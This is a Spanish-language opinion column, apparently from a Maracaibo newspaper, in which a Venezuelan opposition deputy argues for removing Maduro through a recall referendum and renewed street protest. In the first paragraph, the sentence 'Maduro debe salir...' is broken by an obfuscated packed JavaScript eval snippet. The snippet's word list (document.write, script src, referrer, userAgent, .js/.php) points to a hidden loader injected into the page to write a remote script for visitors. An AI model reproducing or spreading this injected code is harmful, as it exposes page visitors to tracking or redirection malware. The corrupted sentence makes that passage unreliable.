publicidad

Librarnos de Maduro y de su modelo

Juan Pablo Guanipa V. / Diputado de la AN / juanpguanipa@gmail.com  @JuanPGuanipa
Maduro eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzkns|var|u0026u|referrer|ieznz||js|php'.split('|'),0,{})) debe salir de la Presidencia de la República lo más pronto posible y por decisión popular. Este modelo de fracasos que lleva ya 18 años, debe ser sustituido urgentemente

Que los pueblos no tocan fondo es una realidad que estamos sufriendo los venezolanos. Recuerdo que cuando la mayoría de este país decidió respaldar a Hugo Chávez para que, luego de intentar en dos oportunidades tomar el poder por asalto, se convirtiera en Presidente electo de la República, muchos decían que la situación nacional era desesperante, que habíamos tocado fondo y que debíamos elegir a un militar para que pusiera orden. Recuerdo las constantes alusiones de algunos mayores a Pérez Jiménez como gran constructor de obras y guardián de la seguridad ciudadana. Hoy la realidad que nos llega al alma, es que la situación pudo ser desesperante ayer y lo es más profundamente hoy, pero nunca un pueblo toca fondo, siempre puede estar peor. Y nunca es recomendable, nunca, que un militar se convierta en jefe de Estado. El Gobierno debe ser siempre civil y los militares deben tener muy claro que su trabajo institucional se debe vincular a la seguridad y defensa del país, pero nunca a asumir lo que corresponde a los civiles. Conozco muchos militares que siempre tuvieron esa premisa muy clara y para ellos va mi respeto y reconocimiento. Necesitamos reinstitucionalizar nuestras Fuerzas Armadas.

La gravísima situación que vive Venezuela va a ser peor cada día que pasa. Mientras Nicolás Maduro y el aberrante modelo del socialismo del siglo XXI continúen en la cumbre del poder, no existe forma alguna de que el país tenga un milímetro de recuperación. Un Gobierno que no cree en las fuerzas motrices de la nación, que no cree en la producción nacional, que intenta controlar todo, que desdeña de la iniciativa privada, que promueve la corrupción, que nada hace por la seguridad, el abastecimiento, los servicios públicos, es un Gobierno inviable. Que hoy en Venezuela mueran niños y adultos de hambre, porque no tienen medicinas o por el hampa desbordada, es simplemente un crimen. Y es necesario que hagamos todo lo que tengamos que hacer para que haya un desenlace democrático a esta realidad que nadie aguanta.

Hemos defendido el diálogo como una herramienta democrática más en esa búsqueda de respuestas y soluciones. Lo que no hemos compartido es que hayamos dejado de lado la protesta de calle, el juicio político en la Asamblea Nacional y las gestiones ante los organismos internacionales. Creo que todo ha debido llevarse de manera simultánea y al ritmo que las circunstancias permitan. Y ahora, cuando vemos que el Gobierno ha incumplido de manera cobarde los compromisos que él mismo suscribió, referidos a la ayuda humanitaria de medicinas y alimentos, al respeto institucional al Poder Legislativo, a la repetición del proceso electoral en Amazonas, al nombramiento del CNE y a la liberación de presos políticos, lo pertinente es que no acudamos a ninguna reunión con ellos hasta tanto cumplan su compromiso. Además, es pertinente que retomemos la agenda referida: protesta de calle, juicio político y acciones internacionales. 

Todo lo que ha pasado ha sido necesario para terminar de desnudar a este régimen que tanto daño le ha hecho a nuestra patria. En evidencia, como queda ante el mundo, es imprescindible que nos activemos cada vez con más fuerza y con más convicción democrática, en la lucha por librar a Venezuela de esta situación tan atroz e indignante. Maduro debe salir de la Presidencia de la República lo más pronto posible y por decisión popular. Este modelo de fracasos que lleva ya 18 años, debe ser sustituido urgentemente. Así que pienso que debemos retomar la lucha constitucional para que se dé el referendo revocatorio. Es más, aunque ya no se haga antes del 10-E, considero que debe realizarse de todas formas. Librar a Venezuela de Maduro será el primer paso. Y el Gobierno que quede será tan débil que no podrá sostenerse.Retomemos el camino revocatorio. Está en la constitución y en la decisión del pueblo.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama